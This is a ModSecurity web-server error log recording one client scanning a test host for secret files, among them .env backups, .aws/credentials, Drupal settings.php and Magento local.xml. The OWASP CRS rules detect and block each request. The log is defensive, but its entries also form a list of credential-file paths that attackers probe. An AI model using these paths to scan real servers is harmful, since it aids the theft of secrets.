[Wed Jan 14 17:35:45.849364 2026] [:error] [pid 1413460] [client 34.220.197.24:51732] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWfF4QByDtVd7SkMa28kawAAAAQ"]
[Wed Jan 14 17:35:45.849530 2026] [:error] [pid 1413460] [client 34.220.197.24:51732] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWfF4QByDtVd7SkMa28kawAAAAQ"]
[Wed Jan 14 17:35:46.570586 2026] [:error] [pid 1413457] [client 34.220.197.24:51890] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWfF4tedw_XRw0xH6MrJVQAAAAE"]
[Wed Jan 14 17:35:46.570761 2026] [:error] [pid 1413457] [client 34.220.197.24:51890] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWfF4tedw_XRw0xH6MrJVQAAAAE"]
[Wed Jan 14 17:35:46.570964 2026] [:error] [pid 1413457] [client 34.220.197.24:51890] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWfF4tedw_XRw0xH6MrJVQAAAAE"]
[Wed Jan 14 17:35:46.571132 2026] [:error] [pid 1413457] [client 34.220.197.24:51890] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWfF4tedw_XRw0xH6MrJVQAAAAE"]
[Wed Jan 14 17:35:48.010538 2026] [authz_core:error] [pid 1413485] [client 34.220.197.24:52274] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/www
[Wed Jan 14 17:35:50.170081 2026] [:error] [pid 1413459] [client 34.220.197.24:52806] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWfF5kmBk0CuCHAyPqetJwAAAAM"]
[Wed Jan 14 17:35:50.170318 2026] [:error] [pid 1413459] [client 34.220.197.24:52806] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWfF5kmBk0CuCHAyPqetJwAAAAM"]
[Wed Jan 14 17:35:50.170510 2026] [:error] [pid 1413459] [client 34.220.197.24:52806] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod.local"] [unique_id "aWfF5kmBk0CuCHAyPqetJwAAAAM"]
[Wed Jan 14 17:35:50.889551 2026] [:error] [pid 1413458] [client 34.220.197.24:52976] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/sites/default/settings.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sites/default/settings.php found within REQUEST_FILENAME: /sites/default/settings.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWfF5sPNANEsYGk5QcxtGwAAAAI"]
[Wed Jan 14 17:35:50.889756 2026] [:error] [pid 1413458] [client 34.220.197.24:52976] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWfF5sPNANEsYGk5QcxtGwAAAAI"]
[Wed Jan 14 17:35:50.889930 2026] [:error] [pid 1413458] [client 34.220.197.24:52976] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/sites/default/settings.php"] [unique_id "aWfF5sPNANEsYGk5QcxtGwAAAAI"]
[Wed Jan 14 17:35:51.628337 2026] [:error] [pid 1413460] [client 34.220.197.24:53138] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWfF5wByDtVd7SkMa28kbAAAAAQ"]
[Wed Jan 14 17:35:51.628545 2026] [:error] [pid 1413460] [client 34.220.197.24:53138] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWfF5wByDtVd7SkMa28kbAAAAAQ"]
[Wed Jan 14 17:35:51.628713 2026] [:error] [pid 1413460] [client 34.220.197.24:53138] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aWfF5wByDtVd7SkMa28kbAAAAAQ"]
[Wed Jan 14 17:35:53.085594 2026] [:error] [pid 1413456] [client 34.220.197.24:53502] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWfF6cFbvLGMHoHvQxNzNQAAAAA"]
[Wed Jan 14 17:35:53.085750 2026] [:error] [pid 1413456] [client 34.220.197.24:53502] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWfF6cFbvLGMHoHvQxNzNQAAAAA"]
[Wed Jan 14 17:35:53.086001 2026] [:error] [pid 1413456] [client 34.220.197.24:53502] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWfF6cFbvLGMHoHvQxNzNQAAAAA"]
[Wed Jan 14 17:35:53.086167 2026] [:error] [pid 1413456] [client 34.220.197.24:53502] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aWfF6cFbvLGMHoHvQxNzNQAAAAA"]
[Wed Jan 14 17:35:53.808182 2026] [:error] [pid 1413485] [client 34.220.197.24:53696] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWfF6bz8c3lrfqFQknOreAAAAAc"]
[Wed Jan 14 17:35:53.808383 2026] [:error] [pid 1413485] [client 34.220.197.24:53696] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWfF6bz8c3lrfqFQknOreAAAAAc"]
[Wed Jan 14 17:35:53.808545 2026] [:error] [pid 1413485] [client 34.220.197.24:53696] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.1"] [unique_id "aWfF6bz8c3lrfqFQknOreAAAAAc"]
[Wed Jan 14 17:35:54.532657 2026] [:error] [pid 1413483] [client 34.220.197.24:53854] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWfF6kEv6TAVy2O49w-G5AAAAAU"]
[Wed Jan 14 17:35:54.532877 2026] [:error] [pid 1413483] [client 34.220.197.24:53854] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWfF6kEv6TAVy2O49w-G5AAAAAU"]
[Wed Jan 14 17:35:54.533060 2026] [:error] [pid 1413483] [client 34.220.197.24:53854] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.dev.local"] [unique_id "aWfF6kEv6TAVy2O49w-G5AAAAAU"]
[Wed Jan 14 17:35:55.981257 2026] [:error] [pid 1413459] [client 34.220.197.24:54194] [client 34.220.197.24] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWfF60mBk0CuCHAyPqetKAAAAAM"]
[Wed Jan 14 17:35:55.981502 2026] [:error] [pid 1413459] [client 34.220.197.24:54194] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWfF60mBk0CuCHAyPqetKAAAAAM"]
[Wed Jan 14 17:35:55.981685 2026] [:error] [pid 1413459] [client 34.220.197.24:54194] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aWfF60mBk0CuCHAyPqetKAAAAAM"]
[Wed Jan 14 17:35:56.703476 2026] [authz_core:error] [pid 1413458] [client 34.220.197.24:54352] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/local.xml
[Wed Jan 14 17:35:58.159441 2026] [:error] [pid 1413457] [client 34.220.197.24:54726] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWfF7tedw_XRw0xH6MrJVwAAAAE"]
[Wed Jan 14 17:35:58.159652 2026] [:error] [pid 1413457] [client 34.220.197.24:54726] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWfF7tedw_XRw0xH6MrJVwAAAAE"]
[Wed Jan 14 17:35:58.159812 2026] [:error] [pid 1413457] [client 34.220.197.24:54726] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aWfF7tedw_XRw0xH6MrJVwAAAAE"]
[Wed Jan 14 17:35:58.877554 2026] [:error] [pid 1413456] [client 34.220.197.24:54900] [client 34.220.197.24] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWfF7sFbvLGMHoHvQxNzNgAAAAA"]
[Wed Jan 14 17:35:58.877761 2026] [:error] [pid 1413456] [client 34.220.197.24:54900] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWfF7sFbvLGMHoHvQxNzNgAAAAA"]
[Wed Jan 14 17:35:58.877931 2026] [:error] [pid 1413456] [client 34.220.197.24:54900] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.staging"] [unique_id "aWfF7sFbvLGMHoHvQxNzNgAAAAA"]
[Wed Jan 14 17:35:59.598365 2026] [:error] [pid 1413485] [client 34.220.197.24:55056] [client 34.220.197.24] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWfF77z8c3lrfqFQknOreQAAAAc"]
[Wed Jan 14 17:35:59.598705 2026] [:error] [pid 1413485] [client 34.220.197.24:55056] [client 34.220.197.24] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWfF77z8c3lrfqFQknOreQAAAAc"]
[Wed Jan 14 17:35:59.598876 2026] [:error] [pid 1413485] [client 34.220.197.24:55056] [client 34.220.197.24] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/logs/error.log"] [unique_id "aWfF77z8c3lrfqFQknOreQAAAAc"]
